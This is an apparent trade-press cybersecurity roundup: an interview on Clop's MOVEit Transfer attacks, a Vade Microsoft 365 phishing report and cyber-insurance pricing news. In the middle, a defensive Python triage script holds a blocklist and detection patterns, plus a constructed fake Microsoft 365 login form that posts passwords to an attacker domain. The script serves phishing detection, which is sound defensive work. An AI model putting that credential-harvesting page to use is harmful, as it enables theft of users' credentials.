The Gately Report: Emsisoft Analyst Shines Light on Clop Ransomware Gang's MOVEit Transfer Attacks
Plus, Vade discovers a new Microsoft 365 phishing attack that could impact businesses’ most sensitive data.
Channel Futures: In addition to your role with Emsisoft, you’re an advisory board member of the Ransomware Harms project. What does it do?
Brett Callow: That’s the Royal United Services Institute Ransomware Harms project and it’s looking at, as the name suggests, the actual harms that ransomware causes both to organizations who are directly impacted and individuals who are indirectly impacted. In the short term, the objectives really center around trying to understand the real impacts of ransomware, because that’s actually a subject that’s been too little explored.
And attacks are very often not fully disclosed. They’re not reported, and even incident response reports can be wrapped up and obscured by attorney-client privilege. So there really isn’t as much information available in relation to attacks as we’d like it to be or the lasting impacts that they can have.
CF: What’s the overall threat landscape looking like so far this year? Are there many differences from last year?
BC: Yes, as far as we can tell, ransomware, which is probably the threat that’s on everyone’s mind, actually dipped a little last year. This year it seems to be back with a vengeance. The reasons for that aren’t clear, but it’s likely due to a variety of factors, including Russia’s invasion of Ukraine.
CF: Victims of the MOVEit Transfer attacks continue racking up. Are you seeing any patterns in terms of who’s been targeted?
BC: It’s very hard to make out any patterns at the moment because it’s still very early days. And we know that there were about 2,500 MOVEit instances exposed to the internet. Clop claimed to have stolen data from hundreds of MOVEit users. And so far we know about roughly 200 of those organizations. Who the rest of them are or what type of data was obtained, we simply don’t know.
CF: We know about Clop’s activities. What other groups have been active this year?
BC: There have been lots of active groups this year. One noticeable development I think is that we have seen a fracturing of the ransomware-as-a-service (RaaS) model. The big operations have received considerable attention from law enforcement and sites are being seized. Other elements of the supply chains have been disrupted. And as a result, I think those big, flashy, noisy operations are less appealing than they once were.
And we are now seeing groups operating under smaller banners and sometimes quite ephemerally, too. The fracturing doesn’t make [the threat landscape] any better necessarily, that’s for sure. And it does make it harder to track and identify who’s doing what, which is very likely what they’re hoping to achieve.
CF: Why does it seem like so many attacks are successful?
BC: We still see a lot of organizations not getting the basics right. They aren’t patching promptly. They aren’t using multifactor authentication (MFA) everywhere it could and should be used. And there’s no such thing as a sure thing. You can never be completely immune to cyberattacks. But if you get those basics right, you can significantly reduce the likelihood of becoming the next victim.
CF: If more organizations were doing at least some of the basics you’re talking about, could that list of MOVEit Transfer attack victims potentially be shorter?
BC: No. That was the exploitation of a zero day and they are very hard to secure against. So getting things right, in this case, probably wouldn’t have made that much difference. That said, there are things that organizations can do to defend against these attacks or at least minimize their exposure. For example, keeping the data on the appliances when it’s no longer needed. Data minimization on these devices could be one route to reducing your exposure.
CF: How is Emsisoft helping partners like MSPs and resellers protect themselves and their customers?
BC: We adapt our products as needed to keep pace with a rapidly evolving threat landscape. We have done that for years and we are continuing to do it today. We fairly recently released an extension to our products, which enables threats to be identified sooner than they otherwise would. And again, blocking threats very, very early in the attack chain reduces the likelihood that they will eventually morph into a successful attack.
CF: We’re deep into summer and into the second half of 2023. What are we likely to see in the months ahead? Are certain months/times of the year more active/less active in terms of cybercrime?
BC: I think we’ll see more of the same. I don’t think we will see any significant changes for the rest of the year. And there is no reason to believe that the number of attacks will significantly increase or decrease. That said, some threats are seasonal. For example, the number of schools that are compromised by ransomware increases significantly in Q3. We think that is because the attackers have compromised the networks earlier in the year, but wait until kids are back in school or just about to go back into school before they deploy the ransomware. That way, the districts are going to be under more pressure to resolve it quickly. They’re not going to have the summer to recover at their leisure, and that may mean they’re more likely to pay.
CF: Could it be months or many months before we have a clearer picture of the full extent of the MOVEit Transfer attacks?
BC: We will certainly get a better understanding of the scope of the MOVEit incident and its impact. I doubt if we will ever have the complete picture though. Organizations do not always disclose incidents even if they’re legally obliged to. They sometimes don’t. And there’s no reason to believe there will be any difference in this case.
CF: What can partners expect from Emsisoft during the remainder of 2023?
BC: I would say more of the same. We constantly update our products and that will continue. Emsisoft aims to provide our partners with the best possible tools to protect their clients and also with the best monetization options.
In other cybersecurity news …
Vade‘s latest research highlights a new Microsoft 365 phishing attack involving malicious HTML files.
In an attack, the victim receives a malicious HTML file as an email attachment, which, if opened, creates a phishing page impersonating Microsoft 365 in the victim’s web browser. If the victim enters their credentials in the fake form on the phishing page, the attackers can harvest those credentials.
Given the popularity of Microsoft 365 in the business world, the likelihood of an account being a corporate account is high, according to Vade. This means that if an attacker gets hold of credentials, they could then get access to businesses’ most sensitive data.
While phishing attacks impersonating Microsoft 365 are nothing new, what’s unique with this incident is the involvement of both the malicious domain eevilcorp[.]online and an application called Hawkeye, which may or may not be related to the HawkEye malware kit, commonly sold as a keylogger and stealer on various hacking forums. The relation between the two has not been confirmed, but did raise Vade researchers’ eyebrows.
Vade isn’t able to identify the number or specifics about anyone that falls for the scam as it does not have access to the platform accounts the attackers are using.
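The attack Vade describes leaves a recognizable shape inside the attachment itself: a page that names Microsoft, a form with a password field, and a submission target that is not a Microsoft sign-in host (here, the domain Vade named). The script below is an added example of how a mail gateway or SOC triage job could check an HTML attachment for that pattern before it reaches a user; it is not Vade’s tooling or anything from the page. The blocklist, the list of legitimate Microsoft sign-in hosts, the brand strings and both sample attachments are constructed assumptions for the example.

```python
"""Triage an HTML e-mail attachment for the Microsoft 365 credential-harvesting pattern."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed blocklist for this example. The one entry is the domain Vade named,
# written here without the "[.]" defanging so it can be compared to parsed URLs.
BLOCKED_DOMAINS = {"eevilcorp.online"}
# Hosts a genuine Microsoft 365 sign-in form may legitimately post to (assumption).
MICROSOFT_LOGIN_HOSTS = ("login.microsoftonline.com", "login.live.com", "microsoft.com")
# Brand strings whose presence next to a password form raises the verdict (assumption).
IMPERSONATED_BRANDS = ("microsoft", "office 365", "outlook", "onedrive", "sharepoint")


class _AttachmentScanner(HTMLParser):
    """Collect every <form>, whether it holds a password field, visible text and inline scripts."""

    def __init__(self):
        super().__init__()
        self.forms, self.text, self.scripts = [], [], []
        self._form = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["has_password"] = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        (self.scripts if self._in_script else self.text).append(data)


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _is_microsoft_host(host):
    return any(host == h or host.endswith("." + h) for h in MICROSOFT_LOGIN_HOSTS)


def triage_html_attachment(html):
    """Return {"verdict": "phishing" | "suspicious" | "clean", "findings": [...]}."""
    scanner = _AttachmentScanner()
    scanner.feed(html)
    scanner.close()
    visible = " ".join(scanner.text).lower()
    script = "\n".join(scanner.scripts)
    findings = []

    for form in scanner.forms:
        if not form["has_password"]:
            continue
        host = _host(form["action"])
        if host in BLOCKED_DOMAINS:
            findings.append(f"password form posts to blocklisted domain {host}")
        elif not host:
            findings.append("password form has no absolute action URL; submission likely handled by script")
        elif not _is_microsoft_host(host):
            findings.append(f"password form posts to non-Microsoft host {host}")

    # Inline script that decodes content at runtime is a common way to hide the real phishing page.
    if re.search(r"\batob\(|\bunescape\(|fromCharCode\(", script):
        findings.append("inline script decodes content at runtime")
    for domain in BLOCKED_DOMAINS:
        if domain in script.lower():
            findings.append(f"inline script references blocklisted domain {domain}")

    brand_hit = any(b in visible for b in IMPERSONATED_BRANDS)
    if findings and brand_hit:
        findings.insert(0, "page text impersonates a Microsoft sign-in")
        verdict = "phishing"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings}


# Constructed sample attachment modelled on the pattern Vade describes; not a real capture.
PHISH_SAMPLE = """<html><body><h2>Microsoft 365</h2>
<p>Sign in to open the document shared with you.</p>
<form method="post" action="https://eevilcorp.online/collect.php">
  <input type="email" name="login"><input type="password" name="passwd">
  <button type="submit">Sign in</button>
</form></body></html>"""

# Constructed benign attachment: a report with no forms or scripts.
BENIGN_SAMPLE = "<html><body><h1>Q2 summary</h1><p>Revenue up 4%.</p></body></html>"

if __name__ == "__main__":
    for name, sample in (("phish", PHISH_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, triage_html_attachment(sample))
```

The verdict is deliberately two-tier: a password form with a suspicious target is only "suspicious" on its own, and becomes "phishing" when the visible text also impersonates a Microsoft sign-in, which keeps internal HTML forms from being quarantined on the form check alone. A form with no absolute action is still flagged, because a page that posts credentials via script (often after decoding its real content with atob) is exactly the case a static form check would otherwise miss.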
Romain Basset, director of customer services at Vade, said anyone could be vulnerable to this attack.
“Most victims of phishing scams simply make an honest mistake because the attackers have done a good job of looking like a reputable site, often posing as a well-known brand like Microsoft,” he said. “First and foremost, organizations should make sure their email users are trained to be on the lookout for phishing scams. Phishing awareness training is something that every organization should require for their email users. Organizations should also use technology like email security tools to filter out phishing and spear phishing attacks before they make it to their users’ inboxes.”
Howden, the international insurance broker, has released its third annual report on cyber insurance, which shows cyber insurance rates fell by 10% in June compared to a year earlier, resulting from fewer than expected claims.
The first half of 2023 saw a significant rise in ransomware attacks, but disclosures from a number of carriers in the first quarter suggest this has not yet been accompanied by a corresponding rise in claims, according to the report.
This points to the efficacy of risk controls in making companies more resilient and supporting a more stable cyber insurance market. Conditions are now relenting, and buyers that have the correct risk controls in place are being rewarded with more favorable pricing and terms.
This puts the market on a sound footing for growth, according to Howden. However, the report shows that more work needs to be done if the market is to meet the growing demands of clients worldwide. By overcoming potential limitations around systemic risk, penetration and capital, the cyber insurance market has an unparalleled opportunity to grow.
Pricing increases in recent years, from 2020 onwards especially, have driven the growth of the cyber insurance market, but these tailwinds for insurers are now unwinding or even reversing in certain areas, according to Howden. Whereas annual rate increases of more than 100% were recorded during the first half of last year, the corresponding period in 2023 has seen flat renewals or even decreases in recent months as pricing has come off historical highs.
“Having navigated the early phases of development that often come with new, fast growing lines of business, the cost of cyber insurance is now more commensurate with loss costs following the recent correction,” said Dan Leahy, Howden’s associate director. “While the first half of 2023 has seen pricing decline, the sustainability of this trend remains uncertain given the pervasive threat environment. Rates nevertheless cannot be relied upon to drive market expansion to the extent that they have recently, requiring ambitious plans for exposure growth. Penetrating new territories and company demographics is therefore pivotal to realizing the full potential of cyber insurance.”
It’s doubtful we’ll ever know the full extent of the Clop ransomware gang’s massive MOVEit Transfer attacks.
That’s according to Brett Callow, ransomware expert and threat analyst at Emsisoft. He’s been tracking the attacks since the start, including all of the organizations Clop has listed as victims.
Emsisoft is a New Zealand-based endpoint protection company that makes antivirus and anti-malware solutions. It has reseller and MSP partners across the globe.
“My research highlights the direction the threat landscape is taking,” Callow said. “And obviously we have to fine-tune our products to take account of that. Threats aren’t the same all the time. Defenses can’t be the same all the time either.”
Clop Ransomware Gang Victims Increasing Daily
The number of MOVEit Transfer attack victims grows by the day. The Clop ransomware gang claims to have stolen data from hundreds of MOVEit Transfer users, and at least 200 organizations have been identified, ranging from U.S. government agencies to the California Public Employees’ Retirement System (CalPERS), the California State Teachers’ Retirement System (CalSTRS), EY, Shell and Cadence Bank.
The number of individuals whose personal information was compromised now exceeds 17.5 million.
Callow said the extent and the scope of this incident is “quite surprising.”
“We are potentially looking at hundreds of organizations here that have lost data, sometimes directly from their own MOVEit installations and sometimes indirectly through the MOVEit installations of their providers, service providers and business partners,” he said. “Clop has been releasing data in some of the cases. I’ve not accessed that data, so I can’t tell you how much of it there is or exactly what it is other than it’s there. And there is now a huge amount of information on that [Clop] site that can be accessed by other cybercriminals and used for their own nefarious purposes, but may also use some of the data that they have stolen for phishing schemes to lure in more victims.”
Want to contact the author directly about this story? Have ideas for a follow-up article? Email Edward Gately or connect with him on LinkedIn.